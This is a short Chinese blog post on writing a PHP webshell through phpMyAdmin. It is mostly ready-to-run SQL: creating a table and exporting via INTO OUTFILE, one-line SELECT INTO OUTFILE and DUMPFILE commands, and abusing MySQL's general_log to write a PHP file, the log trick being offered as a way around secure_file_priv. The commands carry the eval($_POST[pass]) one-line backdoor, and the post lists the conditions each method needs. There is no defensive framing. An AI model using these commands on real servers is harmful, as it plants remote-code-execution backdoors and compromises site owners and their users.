phpAdmin写webshell的方法

一、常规导入shell的操作
    创建数据表导出shell
    CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );
    INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘<?php @eval($_POST[pass]);?>’);
    SELECT `content` FROM `shadow9` INTO OUTFILE ‘C:\\phpStudy\\WWW\\90sec.php’;
    DROP TABLE IF EXISTS `shadow9`;
    
    Ps:(1)利用条件secure_file_priv=(未写路径)
         (2)知道目标的绝对路径
    
二、一句话导出shell:

select ‘<?php @eval($_POST[pass]);?>‘ into outfile ‘c:/phpstudy/www/90sec.php‘; 
select ‘<?php @eval($_POST[pass]);?>‘ into outfile ‘c:\\phpstudy\\www\\90sec.php‘;
select ‘<?php @eval($_POST[pass]);?>‘ into dumpfile ‘c:\\phpstudy\\www\\bypass.php‘;

Ps:(1)利用条件secure_file_priv=(未写路径)
     (2)知道目标的绝对路径

三、日志备份获取shell

show global variables like "%genera%";          //查询general_log配置
set global general_log=‘on‘;              //开启general log模式
SET global general_log_file=‘D:/phpStudy/WWW/cmd.php‘;    //设置日志文件保存路径
SELECT ‘<?php phpinfo();?>‘;              //phpinfo()写入日志文件
set global general_log=‘off‘;              //关闭general_log模式

Ps:(1)可以绕过secure_file_priv=
     (2)知道目标的绝对路径

phpAdmin写webshell的方法

上一篇:CentOS7克隆机能互相ping通,但无法启动network,failed to start LSB


下一篇:Asp.Net Core 3.x (一) 创建项目